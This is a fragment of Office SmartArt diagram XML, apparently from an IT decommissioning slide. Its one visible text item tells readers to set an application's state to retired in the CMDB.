    <dgm:pt modelId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t> Set your application’s state to retired in the CMDB.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" type="parTrans" cxnId="{7525296D-EF48-44D8-8DC7-A7DEAB505D2A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56B4B5BC-D671-4D10-91B2-18BB09341248}" type="sibTrans" cxnId="{7525296D-EF48-44D8-8DC7-A7DEAB505D2A}">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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="6" custScaleX="123722">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="6" custScaleX="123722">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="6" custScaleX="123722" custScaleY="123454">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{992D08B6-B207-435B-A893-D17B49418ACB}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="6" custScaleX="123722" custScaleY="143314">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="6" custScaleX="123722" custScaleY="115434">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>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dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="6" custScaleX="123722">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{CDBFCF02-FA6E-4D66-B298-9F146AABA62A}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" srcOrd="3" destOrd="0" parTransId="{97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" sibTransId="{5B6FED2A-CCAD-4150-BE86-460500775F70}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{9FFDCC0D-EA92-4833-8B98-B807D622A591}" type="presOf" srcId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="3"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8F923414-B3DF-49C1-A49C-0C007DE34406}" type="presOf" srcId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4EB4F215-48C5-4B4D-A173-B7696ED64789}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" srcOrd="4" destOrd="0" parTransId="{3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" sibTransId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}"/>
    <dgm:cxn modelId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" srcOrd="4" destOrd="0" parTransId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" sibTransId="{3AEE799B-7F35-4AE2-93E2-335733E35922}"/>
    <dgm:cxn modelId="{3FDE2218-BCF2-4BF4-A33C-B58969BCEBA3}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{A1479BB3-2B0C-4404-94D6-2197429E5F40}" srcOrd="1" destOrd="0" parTransId="{60603B62-6E95-4C79-956F-0E46FA6C0400}" sibTransId="{4C61C8C1-25B4-4A6F-8ED5-D3C3682DD4A8}"/>
    <dgm:cxn modelId="{1CE06618-969C-494C-8F00-59BDC8DEFE9C}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}" srcOrd="5" destOrd="0" parTransId="{F5BE4E3D-749F-4DF5-916A-F051FA94842E}" sibTransId="{03388AB2-B7BD-4A7D-8228-58066747E14F}"/>
    <dgm:cxn modelId="{552A0B20-1C40-445C-8690-77A8215027F9}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" srcOrd="3" destOrd="0" parTransId="{6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" sibTransId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}"/>
    <dgm:cxn modelId="{A17BC322-142B-4135-B30F-2C9AFF5A01B4}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" srcOrd="2" destOrd="0" parTransId="{918768C3-D12F-4161-B487-A57F29898241}" sibTransId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}"/>
    <dgm:cxn modelId="{6E1CCD24-6D67-4E10-B599-09D2B01DD12D}" type="presOf" srcId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{92E21D25-BE0F-4113-A144-FC36076E0407}" type="presOf" srcId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{58A49D2A-C8CF-4793-85F3-970ACD08AB2E}" type="presOf" srcId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EC86972E-2736-46DF-8B81-4F5B3C0EE806}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{719FD505-9C05-4301-8C8D-24A4329404ED}" srcOrd="1" destOrd="0" parTransId="{423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" sibTransId="{595F5683-5B41-4144-8717-8475FEB51759}"/>
    <dgm:cxn modelId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" srcOrd="5" destOrd="0" parTransId="{95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" sibTransId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}"/>
    <dgm:cxn modelId="{99183B3E-7A16-41C7-9777-2D46365F24B3}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0"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35F07D5F-A54D-4FD3-B7EE-1101CCFEE8D7}" type="presOf" srcId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{15767363-C548-4064-B2A3-0DEF6F775C8B}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{6C1A3AA0-0A77-4751-A48E-1C557AA7A1B1}" srcOrd="1" destOrd="0" parTransId="{DD0DFC2E-077D-41E3-B0A4-63604CB265D1}" sibTransId="{57282919-BDB2-463E-A675-FC48E99ACDA5}"/>
    <dgm:cxn modelId="{B8D3A143-55D7-43CB-9FDB-B957DFB54BA8}" type="presOf" srcId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="6" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{260AC943-43E5-4F53-8F9A-2B3AA7FF95E4}" type="presOf" srcId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1390EC64-B3AE-411D-954D-B363D6D3A64A}" type="presOf" srcId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7627A245-157C-412A-9F89-8049BEB4CB25}" type="presOf" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}"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D074904A-9B1A-4899-94F9-973CB4255F20}" type="presOf" srcId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7525296D-EF48-44D8-8DC7-A7DEAB505D2A}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" srcOrd="3" destOrd="0" parTransId="{A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" sibTransId="{56B4B5BC-D671-4D10-91B2-18BB09341248}"/>
    <dgm:cxn modelId="{05E1F570-6D89-417D-B48C-EF5A7A4B6EEB}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" srcOrd="6" destOrd="0" parTransId="{E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" sibTransId="{585354FF-8734-42ED-AE1D-8349C73E2B59}"/>
    <dgm:cxn modelId="{7E453174-39BC-451D-B88F-8EE9245B24C9}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{B2318C33-0848-4267-9C94-016EE7B20800}" srcOrd="1" destOrd="0" parTransId="{7683A137-9B57-417F-A050-9273448B2B4C}" sibTransId="{7BF13A04-DC8A-4830-AC5F-B50FA511F23C}"/>
    <dgm:cxn modelId="{EA4F7058-4CC0-4B4B-A433-9E2269190A1D}" type="presOf" srcId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8F6FC27A-30CF-4408-BB5E-6A1DA957A06D}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{495252AF-5996-4B38-A1EE-B648650A10A0}" srcOrd="3" destOrd="0" parTransId="{5602DF29-E513-4B50-B37A-05F44A5B2860}" sibTransId="{F126DBDA-495B-4894-915F-3153C0E98C12}"/>
    <dgm:cxn modelId="{B1D6497B-20A7-46AC-B5C3-27A7EEB99B97}" type="presOf" srcId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8B02757C-D9E1-417E-8009-8C0731366961}" type="presOf" srcId="{6C1A3AA0-0A77-4751-A48E-1C557AA7A1B1}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D59F037E-5C88-4537-9D5D-ED2AE6EE0D4C}" type="presOf" srcId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{77B42D81-5C6B-4E08-9FA4-DC3CD3783121}" type="presOf" srcId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3DA7B691-7CEC-44D8-9588-4BDE0F68B5AE}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{89289800-6B11-4BC6-BAD7-66615BE75572}" srcOrd="2" destOrd="0" parTransId="{3703A8D2-81B2-454D-8F9B-0CA1669135F4}" sibTransId="{21537CC5-9214-4600-AAB5-332EE3A4C820}"/>
    <dgm:cxn modelId="{56956A93-A936-4E83-B53E-52B9CD7360C3}" type="presOf" srcId="{719FD505-9C05-4301-8C8D-24A4329404ED}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6CD29E93-BE80-4CD0-BE76-8D6AEE8873C1}" type="presOf" srcId="{44A92D55-6CBA-4BF4-9EEA-1B328C3591FE}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ADC13296-B676-4DC9-ADC3-B8509794BF66}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{44A92D55-6CBA-4BF4-9EEA-1B328C3591FE}" srcOrd="2" destOrd="0" parTransId="{CAD62425-A044-493A-9ACD-CCC204D1EF4F}" sibTransId="{83F80472-48C4-49F9-B224-5AD7D393F679}"/>
    <dgm:cxn modelId="{CE7DB697-6F37-4153-8F0D-905D5A8016E8}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{B37AA48A-B472-430E-BA2D-A5987A2A00B1}" srcOrd="1" destOrd="0" parTransId="{616351A7-0195-4CE7-B5DB-5E2C1EEF2FF1}" sibTransId="{64A73F2A-13B4-4E68-9636-D09B88E2C56B}"/>
    <dgm:cxn modelId="{04DD4B98-CF5B-44A6-86C2-33ED3603EAA1}" type="presOf" srcId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{6BD5EC9B-B492-4021-91C3-69CFD6D09A24}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CCE82A9E-7790-4093-9DF0-EBC6D53E7ED3}" type="presOf" srcId="{B37AA48A-B472-430E-BA2D-A5987A2A00B1}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="1"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763FFEA0-C88A-45E5-8F92-2A5E83D714FD}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}" srcOrd="4" destOrd="0" parTransId="{DA9F1A23-7ABB-43F5-841D-3D2FC9925CFB}" sibTransId="{E2D6A2A1-5438-4DC5-806B-70724658813A}"/>
    <dgm:cxn modelId="{146A4EA3-175B-4E06-AC7B-40AAD1B983FC}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}" srcOrd="2" destOrd="0" parTransId="{D2D2A06B-5339-4194-90B5-CCE406438AF1}" sibTransId="{F48BCD57-6AB8-45C6-AF3F-815020533A4D}"/>
    <dgm:cxn modelId="{BA703DAA-9B41-4D29-9723-261B39AFB443}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" srcOrd="3" destOrd="0" parTransId="{C494CE06-D836-41D9-ADFD-898F15E5786C}" sibTransId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}"/>
    <dgm:cxn modelId="{EFD742AB-448E-4868-8483-E2CB36E11EF2}" type="presOf" srcId="{495252AF-5996-4B38-A1EE-B648650A10A0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3E1D17AE-0190-41E5-B5B9-9EDD1602781C}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0E8D40AF-0DA3-411C-840D-5712D9777A73}" type="presOf" srcId="{B2318C33-0848-4267-9C94-016EE7B20800}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1DC5B6B2-769E-49E6-9E6F-5B1BD60A7093}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" srcOrd="5" destOrd="0" parTransId="{899E3CF7-9D0C-4165-A610-81A1077E783C}" sibTransId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}"/>
    <dgm:cxn modelId="{F9E78DBA-977B-4DD0-A141-D94D2C743E62}" type="presOf" srcId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ECBD12BB-2B0F-4D84-990D-D7EBC2A4B374}" type="presOf" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F1935DBB-203C-4FC1-88EA-2575E8CB033D}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{007D7FBF-C40D-4DB8-B378-158F813DA4D7}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" srcOrd="1" destOrd="0" parTransId="{21595102-299C-4FC9-AD15-9036120CA438}" sibTransId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}"/>
    <dgm:cxn modelId="{CD1C91BF-5147-4ACF-9834-A2FBA9466C1C}" type="presOf" srcId="{89289800-6B11-4BC6-BAD7-66615BE75572}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2"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676748D3-F607-47CC-A287-4A39D51C07C7}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" srcOrd="2" destOrd="0" parTransId="{36639052-9A6E-47C7-A020-F81AA12F1A3C}" sibTransId="{1887D76E-BF0A-4F02-9071-53896CF7538A}"/>
    <dgm:cxn modelId="{82CE15D6-4FC9-4D9C-9C6D-EFEE565C7CC2}" type="presOf" srcId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{87F4EBD6-87BE-4A25-9779-492F73D7B271}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E3982DDB-EC75-41DE-B7D3-F9546476C10D}" type="presOf" srcId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E6EEE8DD-FF26-427B-B1C1-EB643B3126A7}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}" srcOrd="2" destOrd="0" parTransId="{73A5B6BE-984C-43D5-83D1-70267B05EA9B}" sibTransId="{514DE64B-2054-4928-808C-6A92FFA3AA8E}"/>
    <dgm:cxn modelId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" srcOrd="0" destOrd="0" parTransId="{C08C42A3-E914-4795-97F3-69296AA3F73D}" sibTransId="{F7DE2A44-A11B-4BC7-BC1B-F6D335D0C9F6}"/>
    <dgm:cxn modelId="{F1F361EE-EF57-4CB3-9465-965D5F97E292}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{52681EEF-1744-415C-87C4-386855BE8E84}" type="presOf" srcId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B44D63F2-AB6B-4983-9DF8-F210D0EA45C5}" type="presOf" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{21A9CDF6-6611-4A46-8981-112255F11B72}" type="presOf" srcId="{A1479BB3-2B0C-4404-94D6-2197429E5F40}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D659A3FD-174A-4538-9937-4FA16D612987}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" srcOrd="4" destOrd="0" parTransId="{F121DD58-051E-4186-B611-30AF12D23895}" sibTransId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}"/>
    <dgm:cxn modelId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" srcOrd="0" destOrd="0" parTransId="{CEDD41B6-F9E9-4738-8190-4FA86636363D}" sibTransId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}"/>
    <dgm:cxn modelId="{E6B7B6F4-F827-483D-B463-427183ED5830}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BF44EDF3-4505-446C-8D9E-8964E7CA3E7A}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DF18E836-ADCC-4ADD-BF77-2F15A3EAB282}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0EC64AF3-E2C7-4AF7-A1FC-3BFCD87966AC}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8127C106-8A06-4009-B136-777ACDDDD57F}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D777A049-87AD-4EE5-932B-9078778B4323}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
